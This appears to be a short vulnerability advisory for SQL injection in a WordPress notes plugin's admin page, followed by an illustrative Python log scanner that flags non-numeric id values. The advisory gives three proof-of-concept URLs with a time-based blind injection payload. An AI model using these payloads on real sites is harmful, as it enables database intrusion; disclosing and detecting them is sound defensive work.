The plugin does not sanitise and escape the id parameter before using it in various SQL statements via the admin dashboard, leading to SQL injection.
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=view&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=delete&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
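
A detection check for the requests above, added here as an example and not part of the original advisory or the plugin: it scans web-server access-log lines for hits on the affected admin page whose id is not a plain integer. It assumes combined-log-format lines and that a legitimate id is always numeric (as in id=17); the sample log lines, function names and regexes are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Page slug and actions as they appear in the advisory's URLs.
PAGE = "Note_Press-Main-Menu"
ACTIONS = {"view", "edit", "delete"}
# Request field of a combined-log-format line: "METHOD target PROTOCOL".
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate note id is ASCII digits only.
NUMERIC_ID = re.compile(r"[0-9]+")

def check_target(target):
    """Return (action, decoded_id) for a non-numeric id on the affected page, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    # parse_qs URL-decodes values ('+' and %20 become spaces) and keeps repeated keys.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if PAGE not in qs.get("page", []):
        return None
    actions = ACTIONS.intersection(qs.get("action", []))
    if not actions:
        return None
    for value in qs.get("id", []):  # every id is checked, in case the key is repeated
        if not NUMERIC_ID.fullmatch(value):
            return (sorted(actions)[0], value)
    return None

def scan(lines):
    """Return [(line_number, action, decoded_id)] for suspicious requests."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        hit = check_target(match.group(1)) if match else None
        if hit:
            findings.append((number, *hit))
    return findings

# Constructed sample log lines (IPs, times and sizes are made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /wp-admin/admin.php?page=Note_Press-Main-Menu&action=view&id=17 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin.php?page=Note_Press-Main-Menu&action=delete&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt) HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jan/2024:10:00:20 +0000] "GET /wp-admin/admin.php?page=other-plugin&action=view&id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, action, value in scan(SAMPLE_LOG):
        print(f"line {number}: action={action} non-numeric id={value!r}")
```

Only query-string parameters are inspected, so requests that carry id in a POST body will not appear in a standard access log and need application-level logging instead.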